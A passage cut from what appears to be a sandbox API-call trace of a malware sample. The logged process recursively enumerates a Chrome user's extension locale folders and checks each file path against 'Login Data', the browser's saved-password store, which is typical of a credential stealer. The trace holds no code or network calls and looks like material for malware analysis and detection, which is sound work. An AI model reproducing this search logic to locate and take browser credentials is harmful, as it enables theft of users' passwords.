HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de" [0161.678] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*.*" [0161.678] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.678] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.678] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.678] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.678] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.678] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.678] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned 137 [0161.678] lstrlenW (lpString="\\") returned 1 [0161.678] GetProcessHeap () returned 0x8e0000 [0161.678] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.678] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de" [0161.678] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\" [0161.678] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\") returned 138 [0161.678] lstrlenW (lpString="messages.json") returned 13 [0161.678] GetProcessHeap () returned 0x8e0000 [0161.678] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.678] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\" [0161.678] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" [0161.679] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.679] GetProcessHeap () returned 0x8e0000 [0161.679] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.679] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json", lpSrch="Login Data") returned 0x0 [0161.679] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.679] GetProcessHeap () returned 0x8e0000 [0161.679] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.679] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.679] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.679] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.679] GetProcessHeap () returned 0x8e0000 [0161.679] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.679] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.679] GetProcessHeap () returned 0x8e0000 [0161.679] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.679] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="el", cAlternateFileName="")) returned 1 [0161.679] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0161.679] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0161.679] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.679] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.679] lstrlenW (lpString="\\") returned 1 [0161.679] GetProcessHeap () returned 0x8e0000 [0161.679] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.679] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.679] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.679] lstrlenW (lpString="el") returned 2 [0161.679] GetProcessHeap () returned 0x8e0000 [0161.679] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.679] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el" [0161.679] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.679] GetProcessHeap () returned 0x8e0000 [0161.679] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.680] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned 137 [0161.680] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned 137 [0161.680] lstrlenW (lpString="\\*.*") returned 4 [0161.680] GetProcessHeap () returned 0x8e0000 [0161.680] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.680] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el" [0161.680] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*.*" [0161.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.680] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.681] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.681] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.681] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.681] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.681] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned 137 [0161.681] lstrlenW (lpString="\\") returned 1 [0161.681] GetProcessHeap () returned 0x8e0000 [0161.681] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.681] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el" [0161.681] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\" [0161.681] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\") returned 138 [0161.681] lstrlenW (lpString="messages.json") returned 13 [0161.681] GetProcessHeap () returned 0x8e0000 [0161.681] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.681] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\" [0161.681] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" [0161.681] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.681] GetProcessHeap () returned 0x8e0000 [0161.681] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.681] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json", lpSrch="Login Data") returned 0x0 [0161.681] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.681] GetProcessHeap () returned 0x8e0000 [0161.681] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.681] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.681] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.681] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.681] GetProcessHeap () returned 0x8e0000 [0161.681] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.681] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.681] GetProcessHeap () returned 0x8e0000 [0161.681] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.681] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="en_GB", cAlternateFileName="")) returned 1 [0161.681] lstrcmpiW (lpString1="en_GB", lpString2=".") returned 1 [0161.682] lstrcmpiW (lpString1="en_GB", lpString2="..") returned 1 [0161.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.682] lstrlenW (lpString="\\") returned 1 [0161.682] GetProcessHeap () returned 0x8e0000 [0161.682] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.682] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.682] lstrlenW (lpString="en_GB") returned 5 [0161.682] GetProcessHeap () returned 0x8e0000 [0161.682] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.682] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 